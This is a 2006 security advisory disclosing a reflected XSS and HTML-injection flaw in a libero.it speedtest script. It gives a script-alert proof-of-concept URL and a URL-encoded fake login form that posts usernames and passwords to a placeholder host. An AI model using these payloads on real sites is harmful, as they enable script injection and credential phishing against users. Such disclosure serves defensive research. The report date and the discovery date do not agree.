liberoXSS.txt

2006-05-06T00:00:00
ID PACKETSTORM:46085
Type packetstorm
Reporter Davide Denicolo
Modified 2006-05-06T00:00:00

Description

                                        
                                            `--Security Report--  
Advisory: libero.it XSS vulnerability - HTML injection  
---  
Author: Davide Denicolo  
---  
Date: 28/04/06   
---  
Contact: davide<at>securityinfos.com  
---  
Vendor: ItaliaOnLine S.r.l (http://www.libero.it)  
Service: Web  
Level: Low  
---  
Description:  
  
Libero.it is a Web portal of big Italian ISP: ItaliaOnLine offering  
dial-up,Broadband and talk services.  
A Broadband service called "Libero speedtest" is a simple "Bandwidth Speed  
Test";  
A java applet test, send Bandwidth information to perl script  
(print_result_spt.pl) in the GET request and  
this perl script simply put parameter in the page as HTML;  
an attacker can exploit the vulnerable script to have arbitrary script code  
executed in the browser or injects html form so redirect a login  
authentication to another web application;  
  
this is a normal HTTP URL:  
http://assistenza.libero.it/cgi-bin/print_result_spt.pl?down=868.02&up=220.5  
3&tdown=18875&tup=74297&size=2048.0&t=0  
  
this is a XSS URL:  
  
http://assistenza.libero.it/cgi-bin/print_result_spt.pl?down=4742.11&up=<scr  
ipt>alert('ciao')</script>&tdown=3455&tup=5107&size=2048.0&t=0  
  
  
  
and this is an HTML form :  
  
<table border="0" width="32%">  
<form method="POST" action="http://127.0.0.1">  
<tr>  
<td width="19%">  
<input type="text" name="T2"  
style="font-size:7pt">  
</td>  
<td width="81%">  
<select size="1" name="D1"  
style="font-size:8pt">  
<option  
value="1">@libero.it</option>  
<option  
value="2">@inwind.it</option>  
<option value="4">@iol.it</option>  
<option value="66">@blu.it</option>  
</select>  
</td>  
</tr>  
<tr>  
<td width="19%">  
<input type="password" name="T3"  
style="font-size:7pt">  
</td>  
<td>  
<p>  
<input tabindex="4" value="Entra"  
name="Act_Login" src="http://www.libero.it/i05/entra_hp.gif" alt="Entra"  
border="0" height="22" type="image" width="44">  
</p>  
</td>  
</tr>  
</form>  
</table>  
  
and this is previous form injects in the request:  
  
http://assistenza.libero.it/cgi-bin/print_result_spt.pl?down=4742.11&up=<tab  
le%20border="0"%20width="32%"><form%20method="POST"%20action="http://127.0.0  
.1"><tr><td%20width="19%"><input%20type="text"%20name="T2"%20style="font-siz  
e:7pt"></td><td%20width="81%"><select%20size="1"%20name="D1"%20style="font-s  
ize:8pt"><option%20value="1">@libero.it</option><option%20value="2">@inwind.  
it</option><option%20value="4">@iol.it</option><option%20value="66">@blu.it<  
/option></select></td></tr><tr><td%20width="19%"><input%20type="password"%20  
name="T3"%20style="font-size:7pt"></td><td><p><input%20tabindex="4"%20value=  
"Entra"%20name="Act_Login"%20src="http://www.libero.it/i05/entra_hp.gif"%20a  
lt="Entra"%20border="0"%20height="22"%20type="image"%20width="44"></p></td><  
/tr></form></table>&tdown=3455&tup=5107&size=2048.0&t=0  
--   
  
Timeline:  
* 2/05/2006: Vulnerability found.  
* 2/05/2006: Unable to contact vendor  
--   
  
For more information, please send question to: davide<at>secutityinfos.com  
  
  
`